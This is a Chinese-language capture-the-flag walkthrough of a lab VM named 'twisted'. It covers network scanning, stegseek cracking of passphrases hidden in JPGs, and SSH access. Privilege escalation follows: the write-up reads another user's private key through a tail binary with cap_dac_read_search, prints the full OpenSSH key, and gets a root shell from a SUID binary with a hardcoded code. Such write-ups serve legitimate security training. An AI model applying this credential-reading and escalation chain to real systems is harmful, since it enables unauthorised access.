信息搜集 1 2 3 4 5 6 7 8 9 10 11 ┌──(root㉿kali)-[~/Desktop/tmp] └─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 00:0c:29:7d:7d:cf, IPv4: 192.168.31.129 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.31.1 a4:a9:30:df:ef:44 (Unknown) 192.168.31.22 08:00:27:63:fe:59 PCS Systemtechnik GmbH 192.168.31.85 7e:2c:58:df:4e:cb (Unknown: locally administered) 192.168.31.220 46:3e:62:f9:1e:fa (Unknown: locally administered) 4 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 1.972 seconds (129.82 hosts/sec). 4 responded
ip为192.168.31.22. nmap扫描端口
1 2 3 4 5 6 7 8 9 10 11 12 13 14 ┌──(root㉿kali)-[~/Desktop/tmp] └─# nmap 192.168.31.22 --min-rate=1000 -p- Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-24 02:14 EST Stats: 0:00:21 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 95.30% done; ETC: 02:15 (0:00:01 remaining) Nmap scan report for twisted (192.168.31.22) Host is up (0.0065s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 80/tcp open http 2222/tcp open EtherNetIP-1 MAC Address: 08:00:27:63:FE:59 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 22.61 seconds
2222端口为ssh端口
80端口 1 2 3 4 5 6 7 8 9 ┌──(root㉿kali)-[~/Desktop/tmp] └─# curl 192.168.31.22 <h1>I love cats!</h1> <img src="cat-original.jpg" alt="Cat original" width="400" height="400"> <br> <h1>But I prefer this one because seems different</h1> <img src="cat-hidden.jpg" alt="Cat Hidden" width="400" height="400">
80端口存在两张jpg图片
下载下了用stegseek查看
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ┌──(root㉿kali)-[~/Desktop/tmp] └─# stegseek cat-original.jpg StegSeek 0.6 - https://github.com/RickdeJager/StegSeek [i] Found passphrase: "westlife" [i] Original filename: "markus.txt". [i] Extracting to "cat-original.jpg.out". ┌──(root㉿kali)-[~/Desktop/tmp] └─# stegseek cat-hidden.jpg StegSeek 0.6 - https://github.com/RickdeJager/StegSeek [i] Found passphrase: "sexymama" [i] Original filename: "mateo.txt". [i] Extracting to "cat-hidden.jpg.out".
给了两个ssh的账号密码
提权 先登录markus
1 2 3 4 markus@MiWiFi-RA71-srv:~$ cat note.txt Hi bonita, I have saved your id_rsa here: /var/cache/apt/id_rsa Nobody can find it.
给了一个提示,是bonita用户的id_rsa
suid提权看看
1 2 3 4 5 6 7 8 9 10 11 12 13 markus@MiWiFi-RA71-srv:~$ find / -perm -u=s 2>/dev/null /home/bonita/beroot /usr/bin/su /usr/bin/umount /usr/bin/gpasswd /usr/bin/passwd /usr/bin/mount /usr/bin/chfn /usr/bin/chsh /usr/bin/newgrp /usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/eject/dmcrypt-get-device
/home/bonita/beroot
这个很可疑但是没有权限,登录mateo看看
1 2 mateo@MiWiFi-RA71-srv:~$ cat note.txt /var/www/html/gogogo.wav
下载下了,用Audacity查看,能发现这是莫斯,解码得到
1 GO DEEPER... COME WITH ME... LITTLE RABBIT...
没啥用
1 2 3 mateo@MiWiFi-RA71-srv:~$ /usr/sbin/getcap -r / 2>/dev/null /usr/bin/ping = cap_net_raw+ep /usr/bin/tail = cap_dac_read_search+ep
getcap可以查看文件的特殊权限,tail可以读取
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 mateo@MiWiFi-RA71-srv:~$ tail /var/cache/apt/id_rsa -n 100 -----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn NhAAAAAwEAAQAAAQEA8NIseqX1B1YSHTz1A4rFWhjIJffs5vSbAG0Vg2iTa+xshyrmk6zd FyguFUO7tN2TCJGTomDTXrG/KvWaucGvIAXpgV1lQsQkBV/VNrVC1Ioj/Fx3hUaSCC4PBS olvmldJg2habNOUGA4EBKlTwfDi+vjDP8d77mF+rvA3EwR3vj37AiXFk5hBEsqr9cWeTr1 vD5282SncYtJb/Zx0eOa6VVFqDfOB7LKZA2QYIbfR7jezOdX+/nlDKX8Xp07wimFuMJpcF gFnch7ptoxAqe0M0UIEzP+G2ull3m80G5L7Q/3acg14ULnNVs5dTJWPO2Fp7J2qKW+4A5C tt0G5sIBpQAAA8hHx4cBR8eHAQAAAAdzc2gtcnNhAAABAQDw0ix6pfUHVhIdPPUDisVaGM gl9+zm9JsAbRWDaJNr7GyHKuaTrN0XKC4VQ7u03ZMIkZOiYNNesb8q9Zq5wa8gBemBXWVC xCQFX9U2tULUiiP8XHeFRpIILg8FKiW+aV0mDaFps05QYDgQEqVPB8OL6+MM/x3vuYX6u8 DcTBHe+PfsCJcWTmEESyqv1xZ5OvW8PnbzZKdxi0lv9nHR45rpVUWoN84HsspkDZBght9H uN7M51f7+eUMpfxenTvCKYW4wmlwWAWdyHum2jECp7QzRQgTM/4ba6WXebzQbkvtD/dpyD XhQuc1Wzl1MlY87YWnsnaopb7gDkK23QbmwgGlAAAAAwEAAQAAAQAuUW5GpLbNE2vmfbvu U3mDy7JrQxUokrFhUpnJrYp1PoLdOI4ipyPa+VprspxevCM0ibNojtD4rJ1FKPn6cls5gI mZ3RnFzq3S7sy2egSBlpQ3TJ2cX6dktV8kMigSSHenAwYhq2ALq4X86WksGyUsO1FvRX4/ hmJTiFsew+7IAKE+oQHMzpjMGyoiPXfdaI3sa10L2WfkKs4I4K/v/x2pW78HIktaQPutro nxD8/fwGxQnseC69E6vdh/5tS8+lDEfYDz4oEy9AP26Hdtho0D6E9VT9T//2vynHLbmSXK mPbr04h5i9C3h81rh4sAHs9nVAEe3dmZtmZxoZPOJKRhAAAAgFD+g8BhMCovIBrPZlHCu+ bUlbizp9qfXEc8BYZD3frLbVfwuL6dafDVnj7EqpabmrTLFunQG+9/PI6bN+iwloDlugtq yzvf924Kkhdk+N366FLDt06p2tkcmRljm9kKMS3lBPMu9C4+fgo9LCyphiXrm7UbJHDVSP UvPg4Fg/nqAAAAgQD9Q83ZcqDIx5c51fdYsMUCByLby7OiIfXukMoYPWCE2yRqa53PgXjh V2URHPPhqFEa+iB138cSgCU3RxbRK7Qm1S7/P44fnWCaNu920iLed5z2fzvbTytE/h9QpJ LlecEv2Hx03xyRZBsHFkMf+dMDC0ueU692Gl7YxRw+Lic0PQAAAIEA82v3Ytb97SghV7rz a0S5t7v8pSSYZAW0OJ3DJqaLtEvxhhomduhF71T0iw0wy8rSH7j2M5PGCtCZUa2/OqQgKF eERnqQPQSgM0PrATtihXYCTGbWo69NUMcALah0gT5i6nvR1Jr4220InGZEUWHLfvkGTitu D0POe+rjV4B7EYkAAAAOYm9uaXRhQHR3aXN0ZWQBAgMEBQ== -----END OPENSSH PRIVATE KEY-----
ssh登陆,将beroot下载ida分析
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 int __fastcall main(int argc, const char **argv, const char **envp) { int v4; // [rsp+1Ch] [rbp-4h] BYREF printf("Enter the code:\n "); scanf("%i", &v4); if ( v4 == 5880 ) { setuid(0); setgid(0); system("/bin/bash"); } else { puts("\nWRONG"); } return 0; }
只要输入等于5880就会执行/bin/bash
1 2 3 4 bonita@MiWiFi-RA71-srv:~$ ./beroot Enter the code: 5880 root@MiWiFi-RA71-srv:~#
提权结束